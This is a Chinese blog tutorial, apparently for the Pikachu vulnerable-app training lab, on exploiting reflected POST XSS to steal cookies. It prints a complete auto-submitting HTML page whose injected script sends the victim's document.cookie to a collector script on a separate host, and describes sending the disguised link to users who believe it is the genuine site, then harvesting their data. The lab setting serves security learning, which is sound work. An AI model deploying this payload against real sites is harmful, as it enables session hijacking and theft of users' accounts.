首页 > 其他分享 >5.XSS-反射型(post)利用:获取cookie

5.XSS-反射型(post)利用:获取cookie

时间:2024-10-13 19:19:38浏览次数:8  
标签:XSS pikachu pkxss html cookie post document

原理: 在这里插入图片描述

文件路径:\pikachu\pkxss\xcookie\post.html 将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件 需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应) 基于域名配置文件 在这里插入图片描述

基于IP地址配置文件

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.30.168/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<script>
document.location = 'http://192.168.30.168/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post型链接上; 用户误以为是正常网站去访问 在这里插入图片描述

在pkxss平台直接获取用户信息

在这里插入图片描述

标签:XSS,pikachu,pkxss,html,cookie,post,document
From: https://blog.51cto.com/quyunlong/12238461

相关文章

  • cookie 和 session
    1、cookie通过在客户端记录的信息确定用户身份。http是一种无连接协议,客户端和服务端交互仅限于请求/响应过程,结束后断开,下一次请求时,服务端会认为是一个新的客户端。为了维护连接,让服务端知道这是前一个用户发起的请求,必须在一个地方保存客户端信息。2、sessionsession,中文......
  • requests 模块 - post 请求
    1、post请求requests请求方法除了get请求方法外,还有其他方法,比如常用的post方法。post应用场景如下:(1)网页需要登录的情况。(2)需要给网页传输内容的情况。post用法和get用法一样,只是发送请求时需要加上data参数。2、代码示例importrequestsurl='https://fan......
  • XSSer简单了解与使用
    XSSer(CrossSiteScriptingExplorer)是一款自动化的XSS漏洞检测和利用工具,可以在Web应用中发现、利用、报告XSS漏洞,包含了多种选项,可以尝试绕过某些过滤器,并使用各种特殊技术进行代码注入,它通过自动化的工作流程帮助安全人员识别潜在的安全风险,并提供详细的报告,以增强网站的安......
  • XSStrike的简单认识与使用
    XSStrike是一个用于检测XSS漏洞的工具,可以检测反射型、DOM型XSS漏洞,集成了模糊匹配、多线程爬取、WAF绕过、Payload生成、XSS盲注以及通过字典文件枚举等功能。它不像其他工具那样注入有效负载并检查其工作,而是通过多个解析器分析相应,然后通过模糊引擎集成的上下文分析来保证有......
  • PostgreSQL学习笔记十二:灾难防范与数据恢复
    在PostgreSQL中可以采取以下方法进行灾难恢复:一、定期备份物理备份使用pg_dump进行逻辑备份,它可以将数据库以SQL文本的形式导出。例如:pg_dump-Uusernamedbname>backup.sql。可以使用工具将备份文件存储到远程位置,如网络存储或云存储。使用pg_basebackup进......
  • electron-vite_6js-cookie失效
    我们项目是用了js-cookie,后续集成的时候发现,无法进入首页;经过排查是js-cookie无法使用,可能是electron打包后的项目运行的时候是file:///猜测原因:因为Cookie是与域名相关联的,而file:///协议没有域名,因此Cookie可能无法正常工作。file:///C:/Users/Administrator/AppData/......
  • [postgres]使用SSL加密连接
    前言因数据加密传输的要求,应用连接postgres也要配置ssl连接加密,从而防止数据泄露或被篡改。启用ssl连接有利于加强数据安全性,但也会增加连接通信的成本。对于企业级应用,当然还是以安全性为首位。本文使用的postgres版本为15.3配置步骤企业内一般用权威CA机构签发的证书,本地......
  • JWT(JSON Web Token)、Token、Session和Cookie
    JWT(JSONWebToken)、Token、Session和Cookie都是Web开发中常用的概念,它们各自在不同的场景下发挥着重要的作用。以下是对这四个概念的详细解释和比较:一、JWT(JSONWebToken)定义:JWT是一个紧凑的、自包含的用于双方之间安全传输信息的JSON对象。它通过将Token划分为头部(Header......
  • playwright自动登录获取cookie/ck
    有些登录逆向起来比较麻烦,就用了自动化importtimeimportjsonimportrandomfromplaywright.sync_apiimportPlaywright,sync_playwright,expect#https://xxxx.edu.cn/appportalweb/seatspace/"""需要提前10分钟获取ck"""defrun(playwright:Playwright)......
  • 有一种能力认证,叫做工信人才PostgreSQL认证
    有想往数据库行业发展的人要找工作跳槽;有使用PostgreSQL数据库的员工想要升职加薪;有使用PostgreSQL数据库的企业想要招标投标信创项目;来看看工信人才PostgreSQL认证。工信人才PostgreSQL认证是由工业和信息化部人才交流中心主办、北京神脑资讯技术有限公司承办的一种能力......